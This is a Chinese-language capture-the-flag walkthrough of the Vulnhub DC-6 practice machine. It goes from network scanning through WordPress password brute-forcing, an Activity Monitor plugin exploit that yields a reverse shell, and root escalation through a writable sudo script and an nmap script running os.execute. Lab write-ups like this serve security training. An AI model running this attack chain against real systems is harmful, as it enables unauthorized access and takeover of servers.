Vulnhub[DC6]

简介

下载

• DC-6.zip (Size: 619 MB)
• Download: http://www.five86.com/downloads/DC-6.zip
• Download (Mirror): https://download.vulnhub.com/dc/DC-6.zip
• Download (Torrent): https://download.vulnhub.com/dc/DC-6.zip.torrent ( Magnet)

信息收集

主机探活

kali中使用arp-scan进行主机探活

arp-scan --interface eth0 192.168.0.0/24 

经过筛选可以知道192.168.0.141是DC-6的ip

端口扫描

nmap  -sC -sV -p- 192.168.0.141

发现这里只是开了80、22端口

首先从80端口入手

这和之前DC-2是一样的

返回一个错误页面，F12可以看到网页做了一个301永久重定向

修改hosts文件

再次打开正常显示

这里可以看出这又是一个wordpress的页面

然后页面显示的信息跟插件有关

这个题目在官网中还给了线索

CLUE
好吧，这并不是一个真正的线索，但对于那些只想继续工作的人来说，更多的是一些“我们不想花五年时间等待某个过程完成”的建议。
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt 这应该可以为您节省几年时间。 😉

这个线索之后有用的

然后我们还是常规先获取一下用户名

wpscan --url http://wordy/ -e u

能够得到以上用户

然后密码的话就要用到之前官网上给到的提示了

根据提示我们可以得到密码表

然后通过用户名表和密码表爆破后台账号

wpscan --url http://wordy/ -U username.txt -P passwords.txt

找到用户名和密码

登录后台

登录成功，但是其他地方都没有发现有什么问题，但是这个使用了一个插件Activity monitor

渗透

使用msf搜索这个插件

searchsploit activity monitor

这里我们使用第三个

cp /usr/share/exploitdb/exploits/php/webapps/45274.html .

这里我们需要修改的是请求地址和反弹shell的地址

然后python开启http服务并且还要监听9999端口

然后访问127.0.0.1

点击请求

反弹shell成功

然后用python转换成标准的shell

python -c "import pty;pty.spawn('/bin/bash')"

然后在home目录下可以看到四个用户

然后在mark的stuff目录下找到了一个things-to-do.txt文件

这里有graham的密码

我们ssh登录graham

查看当前用户可以执行的操作，发现可以运行jens用户下面的backups.sh

查看backups.sh文件，发现是对web的文件进行打包备份

向backups.sh文件中写入”/bin/bash”，并以jens用户去执行该脚本

脚本执行完成后，可以发现切换到jens用户了

提权

再次查看jens可以执行的操作，发现jens可以在无密码情况下使用nmap命令

这里其实也还有个提示

写入一条命令到getShell，通过nmap运行getShell成功进入root用户

echo 'os.execute("/bin/sh")' > getShell
sudo  nmap  --script=getShell

提权成功

cd ~
cat theflag.txt